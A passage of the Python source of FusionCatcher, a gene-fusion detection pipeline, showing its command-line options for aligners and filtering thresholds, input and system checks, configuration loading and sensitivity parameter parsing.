"+ "Default is '%default'.") parser.add_option("--skip-star", action = "store_true", dest = "skip_star", default = False, help = "If it is set then the pipeline will NOT use the STAR "+ "aligner and all options and methods which make use of "+ "STAR will be disabled. "+ "STAR aligner is used by default. " + "Default is '%default'.") parser.add_option("--skip-bowtie2", action = "store_true", dest = "skip_bowtie2", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the BOWTIE2 "+ # "aligner and all options and methods which make use of "+ # "BOWTIE2 will be disabled. "+ # "BOWTIE2 aligner is used by default. " + # "Default is '%default'.") parser.add_option("--skip-spotlight", action = "store_true", dest = "skip_spotlight", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the spotlight "+ # "method for finding fusion genes. "+ # "Default is '%default'.") # parser.add_option("--skip-bwa", # action = "store_true", # dest = "skip_bwa", # default = False, # help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the BWA "+ # "aligner and all options and methods which make use of "+ # "BWA will be disabled. "+ # "BWA aligner is used by default. " + # "Default is '%default'.") parser.add_option("--skip-conversion-grch37", action = "store_true", dest = "skip_conversion_grch37", default = False, # help = optparse.SUPPRESS_HELP, help = "If it is set then the fusion coordinates for human "+ "genome version GRCh38 (which is default) will NOT be "+ "reported also using version GRCh37/hg19. " + "Default is '%default'.") parser.add_option("--limit-blat", action = "store", type = "int", dest = "limit_blat", default = 3 * (2**30), help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which BLAT aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--limit-bowtie", action = "store", type = "int", dest = "limit_bowtie", default = 2**32 - 100000, # 15.2.2017 was 2**32 - 100000 help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which BOWTIE aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--limit-bowtie2", action = "store", type = "int", dest = "limit_bowtie2", default = 30*(10**6), # 300*(10**6) help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which BOWTIE2 aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--limit-star", action = "store", type = "int", dest = "limit_star", default = 500*(10**6),# original 17.2.2017 => 500*(10**6) ====>,#1,#30*(10**6), # 3 * (2**30) help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which STAR aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. 
"+ # "Default is '%default'.") parser.add_option("--paranoid-sensitive", action = "store_true", dest = "paranoid_sensitive", default = False, help = optparse.SUPPRESS_HELP) # help = "This will increase the sensitivity of finding fusion genes "+ # "at maximum at the expense of very high rate of false positives. "+ # "It is not recommended to be used for finding novel fusion genes. "+ # "It may be used in cases when one searches for already known fusion "+ # "genes which were missed in previous runs with default sensitivity. "+ # "Default is '%default'.") parser.add_option("--label-title", action = "store", type = "string", dest = "label_title", help = optparse.SUPPRESS_HELP) # help = "The label title(s) which will be used to mark the "+ # "candidate fusion genes given as input to '--label-file'. "+ # "If several are given then they should be comma separated. "+ # "If '--label-title' is used then also '--label-file' should be specified.") parser.add_option("--label-file", action = "store", type = "string", dest = "label_file", help = optparse.SUPPRESS_HELP) # help = "File(s) containing pairs of Ensembl gene ids (separated by tab, "+ # "i.e. first two columns) "+ # "candidate fusion genes given as input to '--label-file'. "+ # "If several are given then they should be comma separated. "+ # "If '--label-file' is used then also '--label-title' should be specified.") parser.add_option("--label-threshold", action = "store", type = "string", dest = "label_threshold", help = optparse.SUPPRESS_HELP) # help = "The thresholds which might be given as an optional column 3 "+ # "in '--label-file'. All the pairs given in '--label-file' "+ # "which have the number of column number 3 strictly less than "+ # "this given threshold will be ignored/skipped. "+ # "If several are given then they should be comma separated.") parser.add_option("--skip-rescue", action = "store_true", dest = "skip_star_bowtie", default = False, help = optparse.SUPPRESS_HELP) # help = "By default it is tried to rescue "+ # "STAR's partially mapped reads (which includes also gap alignment "+ # "for IG@ fusions) by running "+ # "again BOWTIE aligner and stich together the the partialy mapped reads. " + # "If this is set then the pipeline will NOT use the BOWTIE "+ # "aligner within the the usage of STAR aligner and no rescuing is done. " + # "Default is '%default'.") parser.add_option("--rescue-wiggle-size", action = "store", type = "int", dest = "rescue_wiggle_size", default = 0, help = optparse.SUPPRESS_HELP) # help = "Some wiggle room is allowed in case of gap alignment of rescued reads. "+ # "Default is '%default'.") parser.add_option("--rescue-gap-size", action = "store", type = "int", dest = "rescue_gap_size", default = 0, help = optparse.SUPPRESS_HELP) # help = "Some very small wiggle room is allowed in case of rescuing the reads alignments. "+ # "Default is '%default'.") parser.add_option("--limitSjdbInsertNsj", action = "store", type = "int", dest = "limitSjdbInsertNsj", default = 2000000, help = "This option is passed diretly to STAR aligner "+ "For more info see STAR aligner regarding this option. " "Default is '%default'.") parser.add_option("--limitOutSJcollapsed", action = "store", type = "int", dest = "limitOutSJcollapsed", default = 1000000, help = "This option is passed diretly to STAR aligner "+ "For more info see STAR aligner regarding this option. " "Default is '%default'.") parser.add_option("--ig-gap-size", action = "store", type = "int", dest = "length_gap", default = 21, # default 18? 
help = optparse.SUPPRESS_HELP) # help = "In case of IG@ fusions a gap in alignment of reads is allowed. "+ # "The maximum length of the gap is specified here. " # "Default is '%default'.") parser.add_option("--ig-gap-mismatches", action = "store", type = "int", dest = "mismatches_gap", default = 7, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mismatches to be allowed for "+ # "mapping reads when also a gap is allowed. "+ # "Default is '%default'.") parser.add_option("--ig-gap-anchor", action = "store", type = "int", dest = "length_anchor_gap", default = 17, # default 14; 17; 18? help = optparse.SUPPRESS_HELP) # help = "In case of gap alignments, it is the minimum length which a read should "+ # "overlap over (or anchor/overhang for) "+ # "fusion junction of a candidate fusion gene in order to be considered for " + # "further analysis. Minimum accepted value is 10 and it should not exceed half "+ # "of the length of the longest read from the input data. "+ # "Default is '%default'.") parser.add_option("--ig-gap-anchor-max", action = "store", type = "int", dest = "length_anchor_gap_max", default = 100, # default 100 help = optparse.SUPPRESS_HELP) # help = "In case of gap alignments, it is the maximum length which a read should "+ # "overlap over (or anchor/overhang for) "+ # "fusion junction of a candidate fusion gene in order to be considered for " + # "further analysis. Minimum accepted value is 10 and it should not exceed half "+ # "of the length of the longest read from the input data. "+ # "Default is '%default'.") parser.add_option("--ig-gap-wiggle-size", action = "store", type = "int", dest = "gap_wiggle_size", default = 2, help = optparse.SUPPRESS_HELP) # help = "Some wiggle room is allowed in case of gap alignment of reads. "+ # "Default is '%default'.") parser.add_option("--ig-gap-skip-extension", action = "store_true", dest = "skip_extension", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the extended reads "+ # "wherever is possible for gap alignment. "+ # "Default is '%default'.") parser.add_option("--ig-bowtie", action = "store_true", dest = "skip_ig_star", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will use BOWTIE instead of STAR "+ # "for gap alignment. "+ # "Default is '%default'.") parser.add_option("--focus", action = "store", type = "string", dest = "focus_fusions", help = optparse.SUPPRESS_HELP) # help = "It contains a tab separated file text containd two columns "+ # "with Ensembl gene ids for candidate fusion genes which will "+ # "be forced to pass the preliminary filtering. This lines should "+ # "be sorted and also the columns should be sorted.") parser.add_option("--reads-preliminary-fusions", action = "store_true", dest = "reads_preliminary_fusions", default = False, help = optparse.SUPPRESS_HELP) # help = "The sequences of all reads which support the preliminary candidate fusion genes "+ # "are extracted. "+ # "Default is '%default'.") parser.add_option("--long", action = "store_true", dest = "long_report", default = False, help = optparse.SUPPRESS_HELP) # help = "A slightly longer report for fusion genes will be generated (i.e. fusions genes will be given per each aligner used). "+ # "Default value is '%default'.") parser.add_option("--skip-bbmerge", action = "store_true", dest = "skip_bbmerge", default = False, help = optparse.SUPPRESS_HELP) # help = "Use BBMERGE.SH instead of original script for merging the paired-end reads. 
"+ # "Default value is '%default'.") parser.add_option("--skip-bbmerge-auto", action = "store_true", dest = "skip_bbmerge_auto", default = False, help = optparse.SUPPRESS_HELP) # help = "Use BBMERGE-AUTO.SH instead of BBMERGE.SH for merging the paired-end reads. "+ # "Default value is '%default'.") parser.add_option("--extract-buffer-size", action = "store", type = "int", dest = "extract_buffer_size", default = 1*(10**9), # default = 2*(10**9) help = optparse.SUPPRESS_HELP) # help = "The size of memory buffer used by Python script (for extracting reads from a FASTQ file based on a list of reads ids). "+ # "This depends more on the amount of memory which Python environment is able to handle and less than the free actual free RAM memory on the computer where this is run. "+ # "It might be that the default value is too high and needs to be lowered, e.g. '500000000' "+ # "be required to be lowered. This is meant to be used together with '--split-seqtk-subseq 0'. " + # "Default is '%default'.") parser.add_option("--split-seqtk-subseq", action = "store", type = "int", dest = "split_seqtk_subseq", default = 1, help = optparse.SUPPRESS_HELP) # help = "The input file (i.e. file containing read ids) of 'SEQTK SUBSEQ' will "+ # "be splitted in a number of parts specified here. If it is 1 then no spliting is done. "+ # "If it is set to 0 then 'SEQTK SUBSEQ' will not be used and instead an alternative Python script is used. "+ # "Setting this to 0 or 2 or larger values is meant to be used in cases when "+ # "'SEQTK SUBSEQ' fails due to not enough memory. "+ # "Default is '%default'.") parser.add_option("--sort-buffer-size", action = "store", dest = "sort_buffer_size", default = "80%", help = "It specifies the buffer size for command SORT. "+ "Default is '%default' if less than 32GB RAM is "+ "installed on computer else is set to 26GB.") parser.add_option("--start", action = "store", type = "int", dest = "start_step", default = 0, help = "It re-starts executing the workflow/pipeline from the given "+ "step number. This can be used when the pipeline "+ "has crashed/stopped and one wants to re-run it from "+ "from the step where it stopped without re-running " + "from the beginning the entire pipeline. "+ "0 is for restarting automatically and 1 is the first step. "+ "Default is '%default'.") choices = ('no','crc32','md5','adler32','sha512','sha256') parser.add_option("--hash", action = "store", type = "choice", choices = choices, dest = "hash", default = "no", help = optparse.SUPPRESS_HELP) # help = "Hash to be used for computing checksum. The choices "+ # "are ['"+"','".join(choices)+"']. "+ # "If it is set up to 'no' then no checksum is used and "+ # "the entire pipeline is executed as a normal shell "+ # "script. For more information see 'hash_library' in "+ # "'workflow.py'. "+ # "Default is '%default'.") parser.add_option("--Xmx", action = "store", type = "string", dest = "xmx", default = "18g", help = "The amount of memory to be used by Java tools. " + "This will be passed to Javas '-Xmx' so for more info see '-Xmx' in java." + "Default is '%default'.") parser.add_option("--reads", action = "store", type = "int", dest = "reads", default = 0, help = "Only the first reads from the input FASTQ files will be used. "+ "Default is '%default'.") parser.add_option("--keep", action = "store_true", dest = "keep_temporary_files", default = False, help = optparse.SUPPRESS_HELP) # help = "Preserve intermediate files produced during the run. "+ # "By default, they are deleted upon exit. 
"+ # "Default value is '%default'.") parser.add_option("--keep-preliminary", action = "store_true", dest = "keep_preliminary", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then preliminary candidate fusion genes are kept (i.e. they are not deleted). "+ # "Default is '%default'.") parser.add_option("--checksums", action = "store", type = "string", dest = "checksums_filename", default = 'checksums.txt', help = optparse.SUPPRESS_HELP) # help = "The name of the checksums file. "+ # "Default value is '%default'. ") parser.add_option("--bowtie-chunkmbs", action = "store", type = "int", dest = "chunkmbs", default = 128, # 128 help = optparse.SUPPRESS_HELP) # help = "The value to be passed to the '--chunkmbs' command line option of Bowtie aligner. "+ # "Default is '%default'.") parser.add_option("--mismatches","-m", action = "store", type = "int", dest = "mismatches", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mismatches to be allowed for "+ # "mapping reads using Bowtie aligner. "+ # "Minimum accepted value is zero and maximum is 3. "+ # "Default is '%default'.") parser.add_option("--mismatches-psl", action = "store", type = "int", dest = "mismatches_psl", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mismatches to be allowed for "+ # "mapping reads using BLAT/STAR/BOWTIE2 aligner. "+ # "Default is '%default'.") parser.add_option("--mismatches-ambiguous", action = "store", type = "int", dest = "ambiguous_mismatches", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mapping mismatches for which the " # "same reads are considered mapping ambiguously. "+ # "Default is '%default'.") parser.add_option("--mismatches-filtering", action = "store", type = "int", dest = "filter_mismatches", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mapping mismatches used for filtering the reads. "+ # "Default is '%default'.") parser.add_option("--top-pairs-fusion", action = "store", type = "int", dest = "spanning_pairs_count", default = 8000, help = optparse.SUPPRESS_HELP) # help = "If the '--pairs-fusion' selects more than N preliminary "+ # "candidate fusion genes then only the first N will be "+ # "considered for further analysis. N is set here. "+ # "Default is '%default'.") parser.add_option("--pairs-fusion","-s", action = "store", dest = "spanning_pairs", default = "3,3,3,3,3", help = optparse.SUPPRESS_HELP) # help = "The minimum number of (encompassing) paired-end reads which "+ # "support a candidate fusion gene and which will be "+ # "considered for further analysis. "+ # "It is given separated by commas for each of "+ # "the aligners: BOWTIE, BLAT, STAR, BOWTIE2, SPOTLIGHT (in this order). " + # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") parser.add_option("--reads-fusion","-r", action = "store", dest = "spanning_reads", default = "2,2,2,2,2", help = optparse.SUPPRESS_HELP) # help = "The minimum number of reads which "+ # "support a candidate fusion gene that is the minimum "+ # "number of reads which overlap over the fusion "+ # "junction. It is given separated by commas for each of "+ # "the aligners: BOWTIE, BLAT, STAR, BOWTIE2, SPOTLIGHT (in this order). " + # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! 
"+ # "Default is '%default'.") parser.add_option("--anchor-fusion","-a", action = "store", dest = "length_anchor", default = "17,17,17,17,40", # default 14; 17; 18? help = optparse.SUPPRESS_HELP) # help = "The minimum length which a read should overlap over (or anchor/overhang for) "+ # "fusion junction of a candidate fusion gene in order to be considered for " + # "further analysis. Minimum accepted value is 10 and it should not exceed half "+ # "of the length of the longest read from the input data. It is given separated "+ # "by commas for each of the aligners: BOWTIE, BLAT, STAR, BOWTIE2, SPOTLIGHT (in this order). " + # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") parser.add_option("--anchor-fusion2","-W", action = "store", type = "int", dest = "length_anchor2", default = 47, # default 22? help = optparse.SUPPRESS_HELP) # help = "If the anchor/overhang which supports the fusion is longer (or equal) than "+ # "this value than the required number of reads supporting the fusion is 1. " + # "It basically overrides '--reads-fusion*' for anchors longer (or equal) than"+ # "the value specified here. It always should be larger than the value "+ # "specified by '--reads-fusion*'. "+ # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") ################################################################################ # # MAIN # ################################################################################ #command line parsing (options, args) = parser.parse_args() # # validate options # if ( (not options.input_filename) or (not options.output_directory) ): parser.print_help() print "EXAMPLE:" print "========" print "" print "fusioncatcher -d /some/data/directory/ -i /some/input/directory/containing/fastq/files/ -o /some/output/directory/" print "" print "" print "where /some/data/directory/ contains data which was built previously by running:" print "" print "" print "fusioncatcher-build -g homo_sapiens -o /some/data/directory/" print "" print "or it has been downloaded (see: FusionCatcher's manual, section 'Downloading/building organism's data')." print "" print "NOTE:" print "'fusioncatcher-build' needs to be run only once (for each organism" print "or when the Ensembl database is updated) and 'fusioncatcher'" print "will reuse the '/some/data/directory/'." print "" print "" print >>sys.stderr, "ERROR: input/output directory is not specified!" print >>sys.stderr, "" sys.exit(1) print "Checking Python version..." pythonversion = sys.version_info if pythonversion >= (2,6) and pythonversion < (3,0) and struct.calcsize("P") * 8 >= 64: print " * Compatible Python version found!" else: print >>sys.stderr, " * ERROR: Found Python version: %s.%s !\n" % (pythonversion[0],pythonversion[1]) print >>sys.stderr, " The Python should be 64-bit and the version should be >=2.6.0 and < 3.0 !" sys.exit(1) print "Checking size of installed RAM memory ..." total_memory = 0 try: total_memory = int(float(os.popen("free -m").readlines()[1].split()[1])) except: pass if total_memory != 0: if total_memory < 23000: print >>sys.stderr, " * ERROR: %d MB of RAM memory found (minimum of 24 GB of RAM memory is needed)!" % (total_memory,) sys.exit(1) else: print " * %d MB of RAM memory found!" % (total_memory,) else: print >>sys.stderr, " * Warning: Not able to detect the size of installed RAM memory!" 
if options.trim_3end > 0 and options.trim_3end_keep > 0:
    parser.error("ERROR: Arguments '--5keep' and '--3end' are mutually exclusive!")
    sys.exit(1)

if options.tmp_directory == "tmp":
    options.tmp_directory = os.path.join(expand(options.output_directory),"tmp")

if expand(options.input_filename) == expand(options.output_directory):
    parser.error("ERROR: Input and output paths should be different!")
    sys.exit(1)

if expand(options.input_filename) == expand(options.tmp_directory):
    parser.error("ERROR: Input and temporary paths should be different!")
    sys.exit(1)

if expand(options.output_directory) == expand(options.tmp_directory):
    parser.error("ERROR: Output and temporary paths should be different!")
    sys.exit(1)

x1 = expand(options.output_directory)
x2 = options.output_directory
if x1.find(",") != -1 or x2.find(",") != -1:
    parser.error("ERROR: Output path contains comma(s)!")
    sys.exit(1)

x1 = expand(options.tmp_directory)
x2 = options.tmp_directory
if x1.find(",") != -1 or x2.find(",") != -1:
    parser.error("ERROR: Temporary path contains comma(s)!")
    sys.exit(1)

# catch, for example, two input files separated by a blank instead of a comma
multiple_files = ["'%s' '%s'" % (sys.argv[i-1],sys.argv[i]) for i in xrange(1,len(sys.argv)) if ((not sys.argv[i-1].startswith('-')) and (not sys.argv[i].startswith('-')))]
if multiple_files:
    print >>sys.stderr,"ERROR: Multiple parameters/values were given for the same command line parameter (for example: two input files separated by a blank)!"
    for mf in multiple_files:
        print >>sys.stderr,mf
    print >>sys.stderr,"POSSIBLE FIX: Please, give multiple parameters/values/filenames for the same command line option by separating them using comma(s)!"
    sys.exit(1)

if options.batch_mode:
    cc = sys.argv[:]
    # re-target argv[0] at the batch front-end before re-invoking
    if cc[0].endswith('fusioncatcher.py'):
        cc[0] = cc[0].replace('fusioncatcher.py','fusioncatcher-batch.py')
    elif cc[0].endswith('fusioncatcher'):
        cc[0] = cc[0] + '-batch.py'
    cc = [e for e in cc if e and e != '--batch']
    r = os.system(' '.join(cc))
    if r:
        print >>sys.stderr,"Error while running fusioncatcher-batch.py!"
        sys.exit(1)
    sys.exit(0)

if options.normal_matched_filename:
    cc = sys.argv[:]
    tempo = adir(expand(options.tmp_directory))
    if not os.path.exists(tempo):
        os.makedirs(tempo)
    tempo_input = os.path.join(tempo,'fusioncatcher-input.log')
    tempo_normal = os.path.join(tempo,'fusioncatcher-normal.log')
    file(tempo_input,'w').write(options.input_filename)
    file(tempo_normal,'w').write(options.normal_matched_filename)
    if cc[0].endswith('fusioncatcher.py'):
        cc[0] = cc[0][:-3]+'-batch.py'
    elif cc[0].endswith('fusioncatcher'):
        cc[0] = cc[0]+'-batch.py'
    # split 'option=value' arguments into separate tokens
    dd = []
    for ik in cc:
        if ik.find("=") == -1:
            dd.append(ik)
        else:
            gi = ik.split("=")
            dd.append(gi[0])
            dd.append(gi[1])
    # drop the original '--input'/'--normal' arguments and their values
    next_i = False
    next_n = False
    com = []
    for ik in dd:
        if ik == '-i' or ik == '--input':
            next_i = True
            continue
        if next_i:
            next_i = False
            continue
        if ik == '--normal' or ik == '-I':
            next_n = True
            continue
        if next_n:
            next_n = False
            continue
        com.append(ik)
    dn = com + ['--input',tempo_input,'--normal',tempo_normal]
    dn = ' '.join(dn)
    print "--------------------------"
    print dn
    print "--------------------------"
    r = os.system(dn)
    if r:
        print >>sys.stderr,"Error while running fusioncatcher-batch.py!"
sys.exit(1) os.remove(tempo_input) os.remove(tempo_normal) shutil.rmtree(tempo) sys.exit(0) # # Reading the configuration file: "configuration.cfg" # config_files = [el for el in options.configuration_filename.split(",") if el and (os.path.isfile(el) or islink(el))] configfile = '' if config_files: configfile = config_files[0] # first one has priority confs = configuration.manage(configfile,skip_python=['openpyxl','xlrd']) if not options.data_directory: p = confs.get("DATA",None) if p and (os.path.isdir(p) or islink(p)): options.data_directory = p else: parser.error("ERROR: Argument '--data' needs to be specified as command line (or in 'configuration.cfg' file)!") sys.exit(1) # check if version of fusioncatcher.py matches the configuration.cfg file p = confs.get("FUSIONCATCHER",None) if p: t = parser.get_version() t = t.lower().split(".py") if t and len(t) == 2 and t[1].strip() == p.lower(): pass else: print >>sys.stderr,"................................................................................" print >>sys.stderr,"ERROR: The version of configuration.cfg file does not match the version of the fusioncatcher.py!" print >>sys.stderr,"Please, fix this!" print >>sys.stderr,"................................................................................" sys.exit(1) else: print >>sys.stderr,"................................................................................" print >>sys.stderr,"ERROR: The version of configuration.cfg file does not contain the version of the fusioncatcher.py!" print >>sys.stderr,"Please, fix this!" print >>sys.stderr,"................................................................................" sys.exit(1) if not options.processes: p = confs.get("THREADS",None) if p: options.processes = int(p) if not options.processes: options.processes = multiprocessing.cpu_count() options.processes = options.processes if options.processes < 17 else 16 config_aligners = confs.get("ALIGNERS","") if options.processes and options.processes > multiprocessing.cpu_count(): options.processes = multiprocessing.cpu_count() # getting absolute paths for the tools and scripts from configuration.cfg _B2_ = confs.get("BOWTIE2").rstrip("/")+"/" if options.force_paths else '' _BA_ = confs.get("BWA").rstrip("/")+"/" if options.force_paths else '' _BE_ = confs.get("BOWTIE").rstrip("/")+"/" if options.force_paths else '' _BT_ = confs.get("BLAT").rstrip("/")+"/" if options.force_paths else '' _BP_ = confs.get("BBMAP").rstrip("/")+"/" if options.force_paths else '' _FC_ = confs.get("SCRIPTS").rstrip("/")+"/" if options.force_paths else '' _FK_ = confs.get("FASTQTK").rstrip("/")+"/" if options.force_paths else '' _FT_ = confs.get("FATOTWOBIT").rstrip("/")+"/" if options.force_paths else '' _JA_ = confs.get("JAVA").rstrip("/")+"/" if options.force_paths else '' _LR_ = confs.get("LIFTOVER").rstrip("/")+"/" if options.force_paths else '' _OS_ = confs.get("OASES").rstrip("/")+"/" if options.force_paths else '' _PD_ = confs.get("PICARD").rstrip("/")+"/" if options.force_paths else '' _PL_ = confs.get("PARALLEL").rstrip("/")+"/" if options.force_paths else '' _PZ_ = confs.get("PIGZ").rstrip("/")+"/" if options.force_paths else '' _SA_ = confs.get("SRA").rstrip("/")+"/" if options.force_paths else '' _SK_ = confs.get("SEQTK").rstrip("/")+"/" if options.force_paths else '' _SS_ = confs.get("SAMTOOLS").rstrip("/")+"/" if options.force_paths else '' _SR_ = confs.get("STAR").rstrip("/")+"/" if options.force_paths else '' _VT_ = confs.get("VELVET").rstrip("/")+"/" if options.force_paths else '' # # 
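# Note: each `_XX_` prefix above holds the directory of one external tool as
# taken from configuration.cfg, with a trailing "/" re-appended, so that e.g.
# _BE_+'bowtie' resolves to the pinned Bowtie binary. Without --force-paths
# every prefix stays an empty string and the tools are resolved through $PATH
# instead. Illustrative pattern (the resolved path depends on the local
# configuration.cfg):
#
#   _BE_ = confs.get("BOWTIE").rstrip("/")+"/" if options.force_paths else ''
#   # later: job.add(_BE_+'bowtie',kind='program')  ->  e.g. /opt/bowtie/bowtie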
#
# DIRECTORIES
#
data_dir = adir(expand(options.data_directory))
out_dir = adir(expand(options.output_directory))
tmp_dir = adir(expand(options.tmp_directory))

log_file = expand(outdir('fusioncatcher.log'))
info_file = expand(outdir('info.txt'))

################################################################################
# Managing OPTIONS
################################################################################
eporcrlf2igh = False

if options.skip_mitochondrion_filtering:
    options.biotypes = options.biotypes.replace('mt','').replace(',,',',')

if options.homolog == 0:
    options.biotypes = options.biotypes.replace('similar_reads','').replace(',,',',')

if options.skip_adjacent and options.biotypes.find('adjacent') == -1:
    options.biotypes = options.biotypes + ',adjacent'

if options.skip_banned_fusions:
    options.biotypes = options.biotypes.replace('banned','').replace(',,',',')
    options.biotypes = options.biotypes.replace('healthy','').replace(',,',',')

if options.skip_blat:
    options.trim_blat = False
    options.psl_visualization = False
    options.skip_prefiltering_blat = False

if options.keep_viruses:
    options.skip_viruses_filtering = False

opt_alg = options.aligners
if opt_alg.lower().find(".cfg") != -1:
    # a configuration file was given instead of a list of aligners
    oa = set([el for el in opt_alg.lower().split(',') if el.find('.cfg') != -1])
    # try to read the configuration file
    if config_aligners:
        opt_alg = config_aligners
    else:
        opt_alg = ','.join(oa)
alg = set([el for el in opt_alg.lower().split(',')])

if (not options.skip_blat) and ('blat' not in alg):
    options.skip_blat = True
if (not options.skip_star) and ('star' not in alg):
    options.skip_star = True
if (not options.skip_bowtie2) and ('bowtie2' not in alg):
    options.skip_bowtie2 = True
# if (not options.skip_bwa) and ('bwa' not in alg):
#     options.skip_bwa = True
# if (not options.skip_spotlight) and ('spotlight' not in alg):
#     options.skip_spotlight = True

# create the output directory
if (not os.path.isdir(out_dir)) and (not islink(out_dir)):
    if os.path.isfile(out_dir):
        print >>sys.stderr, "ERROR: The output directory is actually a file! Please, delete it before proceeding further!"
        sys.exit(1)
    else:
        os.makedirs(out_dir)

# deal with the temporary files flag
temp_flag = 'yes'
if options.keep_temporary_files or (options.hash and options.hash != 'no'):
    temp_flag = 'no'

################################################################################
# SENSITIVE
################################################################################
sensitive = 0
# if options.sensitive:
#     options.spanning_pairs = "2,2,2,2,2"
#     options.spanning_reads = "2,2,2,2,2"
#     options.length_anchor = "14,17,17,17,17"
#     options.length_anchor2 = 40
#     sensitive = sensitive + 1
# ################################################################################
# # MILD SENSITIVE
# ################################################################################
# if options.mildly_sensitive:
#     options.spanning_pairs = "2,2,2,2,2"
#     options.spanning_reads = "2,2,2,2,2"
#     options.length_anchor = "13,15,15,15,15"
#     options.length_anchor2 = 22
#     options.mismatches = 2
#     options.mismatches_psl = 4
#     sensitive = sensitive + 1
# ################################################################################
# # HIGHLY SENSITIVE
# ################################################################################
# if options.highly_sensitive:
#     options.spanning_pairs = "2,2,2,2,2"
#     options.spanning_reads = "1,1,1,1,1"
#     options.length_anchor = "13,14,14,14,14"
#     options.length_anchor2 = 22
#     options.mismatches = 2
#     options.mismatches_psl = 4
#     options.skip_prefiltering_psl = True
#     sensitive = sensitive + 1
################################################################################
# PARANOID SENSITIVE
################################################################################
if options.paranoid_sensitive:
    options.spanning_pairs = "2,2,2,2,2"
    options.spanning_reads = "1,1,1,1,1"
    options.length_anchor = "11,11,11,11,30"
    options.length_anchor2 = 22
    options.mismatches = 2
    #options.mismatches_psl = 4
    #options.spanning_pairs_count = 20000
    #options.homolog = 0
    #options.skip_prefiltering_psl = True
    # options.all_reads_junction = True
    sensitive = sensitive + 1

if sensitive > 1:
    parser.error("ERROR: The command line options: '--paranoid-sensitive','--sensitive','--mildly-sensitive','--highly-sensitive' are mutually exclusive!")
    sys.exit(1)

eporcrlf2igh = False

################################################################################

spanning_pairs = options.spanning_pairs.split(',')
if len(spanning_pairs) != 5:
    print >>sys.stderr, "ERROR: the command option SPANNING_PAIRS has been given incorrectly! Expecting 5 values separated by 4 commas!"
    sys.exit(1)
spanning_pairs_bowtie = int(spanning_pairs[0])
spanning_pairs_blat = int(spanning_pairs[1])
spanning_pairs_star = int(spanning_pairs[2])
spanning_pairs_bowtie2 = int(spanning_pairs[3])
# spanning_pairs_bwa = int(spanning_pairs[4])
spanning_pairs_spotlight = int(spanning_pairs[4])
spanning_pairs_minimum = min(map(int,spanning_pairs))

spanning_reads = options.spanning_reads.split(',')
if len(spanning_reads) != 5:
    print >>sys.stderr, "ERROR: the command option SPANNING_READS has been given incorrectly! Expecting 5 values separated by 4 commas!"
    sys.exit(1)
spanning_reads_bowtie = int(spanning_reads[0])
spanning_reads_blat = int(spanning_reads[1])
spanning_reads_star = int(spanning_reads[2])
spanning_reads_bowtie2 = int(spanning_reads[3])
# spanning_reads_bwa = int(spanning_reads[4])
spanning_reads_spotlight = int(spanning_reads[4])
spanning_reads_minimum = min(map(int,spanning_reads))

length_anchor = options.length_anchor.split(',')
if len(length_anchor) != 5:
    print >>sys.stderr, "ERROR: the command option LENGTH_ANCHOR has been given incorrectly! Expecting 5 values separated by 4 commas!"
    sys.exit(1)
length_anchor_bowtie = int(length_anchor[0])
length_anchor_blat = int(length_anchor[1])
length_anchor_star = int(length_anchor[2])
length_anchor_bowtie2 = int(length_anchor[3])
# length_anchor_bwa = int(length_anchor[4])
length_anchor_spotlight = int(length_anchor[4])
length_anchor_minimum = min(map(int,length_anchor))
length_anchor2 = options.length_anchor2

fragments_flag = False

organism = file(datadir("organism.txt"),"r").readline().rstrip('\r\n').lower()

if spanning_reads_minimum < 1:
    parser.error("ERROR: The minimum value of the SPANNING_READS is 1 but the value %s was given!" % (options.spanning_reads,))
    sys.exit(1)

if length_anchor_minimum < 10:
    parser.error("ERROR: The minimum value of the LENGTH_ANCHOR is 10 but the value %s was given!" % (options.length_anchor,))
    sys.exit(1)

if length_anchor2 <= length_anchor_minimum:
    parser.error("ERROR: --anchor-fusion2 (%d) should be larger than anchor-fusion (%s)!" % (options.length_anchor2,options.length_anchor))
    sys.exit(1)

if spanning_pairs_bowtie != spanning_pairs_minimum or spanning_pairs_bowtie < 1:
    parser.error("ERROR: The SPANNING_PAIRS value for Bowtie must be the smallest one given and at least 1, but the value %s was given!" % (options.spanning_pairs,))
    sys.exit(1)

if options.skip_star_bowtie and (not is_optparse_provided(parser,'limit_star')):
    options.limit_star = int(2.7 * (2**30))

if options.trim_3end_keep2 != 0:
    if options.trim_3end_keep2 + length_anchor_minimum > options.trim_3end_keep and options.trim_3end_keep2 < 20:
        print >>sys.stderr, "ERROR: The trimming options are inconsistent! See '--trim_3end_keep' and '--trim_3end_keep2' for info!"
        sys.exit(1)

# test that the build data is present
if empty(datadir('version.txt')) or ( not os.path.exists(datadir('transcripts.fa'))) or ( not os.path.exists(datadir('genes.txt'))):
    print >>sys.stderr,"\n\n"
